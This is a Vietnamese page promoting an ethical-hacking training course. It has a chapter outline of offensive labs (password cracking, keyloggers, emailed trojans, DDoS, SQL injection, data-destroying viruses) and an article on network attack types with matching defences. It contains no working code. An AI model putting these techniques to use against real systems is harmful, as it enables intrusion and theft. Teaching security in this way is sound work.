Một CEH là người có kỹ năng chuyên nghiệp, thấu hiểu các cách thâm nhập của kẻ tấn công. Họ sử dụng chính những công cụ của một kẻ Hacker chuyên nghiệp để thâm nhập vào hệ thống để kiểm tra tính bảo mật nhằm đưa ra cách ngăn chặn các cuộc tấn công bằng các công cụ đó.

CHƯƠNG TRÌNH ĐÀO TẠO AN NINH MẠNG - HACKER MŨ TRẮNG





HÃY LÀ HACKER ĐỂ CHỐNG LẠI HACKER!

BẠN ĐÃ SẴN SÀNG LÀ HACKER ĐẦU TIÊN TẠI HƯNG YÊN?



Chương 1: FOOTPRINTING
I. Giới thiệu về Foot Print
II. Các bài thực hành
Bài 1: Tìm thông tin về Domain
Bài 2: Tìm thông tin email

Chương 2: SCANNING
I. Giới thiệu về Scanning
II. Các Bài thực hành
Bài 1: Sử dụng Phần mềm Nmap
Bài 2: Sử dụng phần mềm Retina để phát hiện các vulnerabilities và tấn công bằng Metaesploit framework

Chương 3: SYSTEM HACKING
I. Giới thiệu System Hacking
II. Thực hành các bài Lab
Bài 1: Crack password nội bộ
Bài 2: Sử dụng chương trình pwdump3v2 khi có được 1 user administrator của máy nạn nhân để có thể tìm được thông tin các user còn lại
Bài 3: Sử dụng Keylogger

Chương 4: TROJAN và BACKDOOR
I. Giới thiệu về Trojan và Backdoor
II. Các bài thực hành
Bài 1 Sử dụng netcat
Bài 2: Sử dụng Trojan dưới dạng Webbase

Chương 5: CÁC PHƯƠNG PHÁP SNIFFER
I. Giới thiệu về Sniffer
II. Thực hành sniffer trong mạng LAN

Chương 6: Tấn Công từ chối dịch vụ DoS.
I. Giới thiệu:
II. Các bài Lab:
Bài 1: DoS bằng cách sử dụng Ping of death.
Bài 2: Sử dụng flash để DDoS

Chương 7: Social Engineering
I/ Giới Thiệu
II/ Thực hành bài Lab:
Bài 1: Gửi email nặc danh đính kèm Trojan
Bài 2: Tích hợp Trojan vào một file khác và thực thi chúng

Chương 8: Hacking Web Server
I/ Giới thiệu:
II/ Thực Hiện bài lab
Bài 1: Tấn công Web Server Win 2003(lỗi Apache)
Bài 2: Khai thác lỗi ứng dụng Server Linux

Chương 9: WEB APPLICATION HACKING
I/ Giới thiệu:
II/ Các Bài Lab
Bài 1: Cross Site Scripting
Bài 2: Local hacking

Chương 10: SQL INJECTION
I/ Giới thiệu về SQL Injection:
II/ Các bài Lab
Bài 1: Ms Access injection
Bài 2: Ms SQL injection
Bài 3: My SQL injection

Chương 11: WIRELESS HACKING
I/ Giới Thiệu
II/ Thực hành bài Lab:

Chương 12: VIRUS
I/ Giới thiệu: (tham khảo bài đọc thêm)
II/ Thực hành Lab: Virus phá hủy dữ liệu máy

Các hình thức tấn công mạng
(Thứ Sáu, 11/05/2007 - 9:44 AM)

Có thể phân thành 4 dạng như sau:


1) Reconnaissance attacks (Do Tham):

Bước đầu hacker ping đến tằm nhắm để xác định địa chỉ IP đích. Sau đó, hacker xác định những port cũng như những dịch vụ đang “sống” trên địa chỉ IP đó.

Từ những thông tin này, hacker bắt đầu xác định được dạng và phiên bản của hệ điều hành. Hacker tiến hành đánh cắp dữ liệu hoặc phá huỷ hệ điều hành của mạng.

Các hình thức tấn công dạng này bao gồm: packet sniffers, port scans, ping sweeps, internet information queries.

a) Packet sniffers:

Là phần mềm ứng dụng dùng một card adapter với promiseous mode để bắt giữ tất cả các gói tin gởi xuyên qua một mạng LAN. Kỹ thuật này chỉ thực hiện được trên cùng một collision domain.

Packet sniffers sẽ khai thác những thông tin được truyền ở dạng clear text. Những giao thức truyền ở dạng clear text bao gồm: Telnet, FTP, SNMP, POP, HTTP…

Một vd như sau:

Code:

TCP - Transport Control Protocol
Source Port: 3207
Destination Port: 110 pop3
Sequence Number: 1904801188
Ack Number: 1883396256
Offset: 5 (20 bytes)
Reserved: %000000
Flags: %011000
0. .... (No Urgent pointer)
.1 .... Ack
.. 1... Push
.. .0.. (No Reset)
.. ..0. (No SYN)
.. ...0 (No FIN)
Window: 64161
Checksum: 0x078F
Urgent Pointer: 0
No TCP Options
POP - Post Office Protocol
Line 1: PASS secretpass

Ta nhận thấy password được truyền đi ở dạng clear text là secrectpass.

Bởi vì packet được truyền đi không được mã hoá như trên, nó có thể bị xử lý bởi bất kỳ ai sử dụng kỹ thuật packet sniffers.

Những công cụ sau được dùng ngăn cản packet sniffers gồm: authentication, switched infrastrutured, antisniffer va cryptography.

Authentication:

Kỹ thuật xác thực này được thực hiện phổ biến như one-type password (OTPs). Kỹ thuật này được thực hiện bao gồm hai yếu tố: personal identification number ( PIN ) và token card để xác thực một thiết bị hoặc một phần mềm ứng dụng.

Token card là thiết bị phần cứng hoặc phần mềm sản sinh ra thông tin một cách ngẫu nhiên ( password ) tai một thời điểm, thường là 60 giây.

Khách hàng sẽ kết nối password đó với một PIN để tạo ra một password duy nhất. Giả sử một hacker học được password đó bằng kỹ thuật packet sniffers, thông tin đó cũng không có giá trị vì nó đã hết hạn.

Switched infrastructured:

Kỹ thuật này có thể dùng để ngăn chặn packet sniffers trong môi trường mạng. Vd: nếu toàn bộ hệ thống sử dụng switch ethernet, hacker chỉ có thể xâm nhập vào luồng traffic đang lưu thông tại 1 host mà hacker kết nối đến. Kỹ thuật này không làm ngăn chặn hoàn toàn packet sniffer nhưng nó có thể giảm được tầm ảnh hưởng của nó.

Antisniffer tools:

Là những phần mềm và phần cứng được thiết kế để ngăn chặn sniffer. Thật sự những ứng dụng này không ngăn chặn được hoàn toàn nguy cơ bị sniffer nhưng cũng giống như những công cụ khác, nó là một phần của toàn bộ hệ thống.

Cryptography:

Kỹ thuật mã hoá này giúp cho dữ liệu được truyền đi qua mạng ma không ở dạng clear text. Giả sử hacker có bắt được dữ liệu thì cũng không thể giải mã được thông tin.

Phương pháp này có hiệu lực hơn so với việc dò tìm và ngăn cản sniffer. Nếu như một kênh truyền được mã hoá, dữ liệu mà packet sniffer dò tìm được cũng không có giá trị và không phải là thông tin chính xác ban đầu.

Hệ thống mã hóa của Cisco dựa trên kỹ thuật IPSec, giao thức mã hóa “ đường hầm” dựa trên địa chỉ IP. Những giao thức gồm: Secure Sell Protocol ( SSH ) và Secure Socket Layer ( SSL ).

b) Port scans va ping sweeps:

Kỹ thuật này được tiến hành nhằm những mục đích như sau:

Xác định những dịch vụ trong mạng

Xác định các host và thiết bị đang vận hành trong mạng

Xác định hệ điều hành trong hệ thống

Xác định tất cả các điểm yếu trong mạng, từ đó tiến hành những mục đích khác.

Với kỹ thuật ping sweeps, hacker có thể xác định một danh sách các host đang sống trong một môi trường. Từ đó, hacker sử dụng công cụ port scans xoay vòng qua tất cả các port và cung cấp một danh sách đầy đủ các dịch vụ đang chạy trên host đã tìm thấy bởi ping sweeps. Công viêc tiếp theo là hacker xác định những dịch vụ có điểm yếu và bắt đầu tấn công vào điểm yếu này.

Kỹ thuật IDS được dùng để cảnh báo cho nhà quản trị khi có reconnaissance attacks như là port scans va ping sweeps. IDS giúp nhà quản trị có sự chuẩn bị tốt nhằm ngăn cản hacker.

c) Internet information queries:

DNS queries có thể chỉ ra nhiều thông tin như là người sở hữu một domain nào đó và range địa chỉ nào được ấn định cho domain đó.

Hacker sử dụng công cụ này để “ trinh sát” tìm ra các thông tin trên mạng.

Cùng với port scans và ping sweeps, sau khi tìm ra được những thông tin đầy đủ như các port active, các giao thức chạy trên port đó, hacker tiến hành kiểm tra những đặc trưng của các ứng dụng này để tìm ra điểm yếu và bắt đầu tấn công.

2) Access attacks:

Trong phương pháp này, kẻ xâm nhập điển hình tấn công vào mạng nhằm: đánh cắp dữ liệu, giành lấy quyền access, và giành lấy những đặc quyền access sau này.

Access attacks có thể bao gồm:

Password attack

Trust exploitation

Port redirection

Man in the middle attack

a) Password attack:

Hacker có thế xâm nhập hệ thống dùng các kỹ thuật brute-force attacks, trojan horce, IP spoofing và packet sniffer.

Thường một cuộc tấn công brute-force attack được thực hiện dùng 1 chu trình chạy xuyên qua mạng và cố gắng xen vào chia sẻ môi trường. Khi hacker giành được quyền access đến một nguồn tài nguyên, hacker cùng với user cùng chia sẻ quyền lợi. Nếu như có đủ tài nguyên thì hacker sẽ tạo ra một của sổ kín cho lần access sau.

Hacker có thể làm thay đổi bảng định tuyến trong mạng. Điều đó sẽ làm chắc chắn rằng tất cả các gói tin sẽ được gởi đến hacker trước khi được gởi đến đích cuối cùng.

Trong một vài trường hợp, hacker có thể giám sát tất cả các traffic, thật sự trở thành một man in the middle.

Ta có thể hạn chế password attack bằng những cách sau:

Không cho phép user dùng cùng password trên các hệ thống.

Làm mất hiệu lực account sau một vài lần login không thành công. Bước kiểm tra này giúp ngăn chặn việc rà soát password nhiều lần.

Không dùng passwords dạng clear text: dùng kỹ thuật OTP hoặc mã hoá password như đã trình bày phần trên.
Dùng “strong” passwords: Dạng password này dùng ít nhất 8 ký tự, chứa các uppercase letters, lowercase letters, những con số và những ký tự đặc biệt.

b) Trust exploitation:

Đây là phương pháp “ khai thác tin cậy “, nó dựa vào các mối quan hệ tin cậy bên trong mạng.

Bình thường, nếu hai domain có mối quan hệ tin cậy với nhau thì cho phép thiết bị domain này có thể access vào domain kia.

Hacker sẽ lợi dụng sơ hở trong mối quan hệ tin cậy nhằm khai thác các sai sót trong mối quan hệ này để thoả hiệp, tức là để kiểm soát.

Hệ thống bên ngoài firewall sẽ có mối quan hệ hoàn toàn không tin cậy với hệ thống bên trong firewall.

c) Port redirection:

Là một dạng khác của trust exploitation attack mà nó sử dụng một host thoả hiệp nhằm lấy giấy phép ra vào firewall.
Ta có thể tượng như là một firewall với 3 interface và mỗi interface kết nối với 1 host. Host ở bên ngoài có thể hướng đến host ở public services ( thường được gọi là demilitanized zone- DMZ ). Và host ở public services có thể hướng tới cả host ở bên trong hay bên ngoài firewall.Hacker làm cho host ở public service trở thành 1 host thoả hiệp. Hacker đặt một phần mềm tại host này nhằm tạo ra một traffic trực tiếp từ host outside đến host inside. Kết nối này sẽ ko thực hiện thông qua firewall. Như vậy, host bên ngoài giành được quyền kết nối với host bên trong thông qua qui trình port redirection tại host trung tâm ( public services host ).

d) Man in the middle attack:

Kỹ thuật man in the middle được thực hịên bao gồm:

Netword packet sniffers

Giao thức routing và transport.

Tấn công man in the middle nhằm mục đích:

Đánh cắp dữ liệu

Giành lấy một phiên giao dịch

Phân tích traffic trong mạng

DoS

Phá hỏng dữ liệu được truyền

Một ví dụ của man in the middle attack đó là: một người làm việc cho ISP và cố gắng access đến tất cả các gói dữ liệu vận chuyển giữa ISP và bất kỳ một mạng nào khác.

Ta có thể ngăn chặn hình thức tấn công này bằng kỹ thuật mã hoá: mã hoá traffic trong một đường hầm IPSec, hacker sẽ chỉ nhìn thấy những thông tin không có giá trị.
Theo vietnamlab

Ebook:
network-security-a-beginners-guide-second-edition

Website:
http://www.hvaonline.net
http://diendanhacker.org/
http://nmap.org
http://www.nirsoft.net > nhieu tool hay

http://www.hackthis.co.uk -> Learn to hack web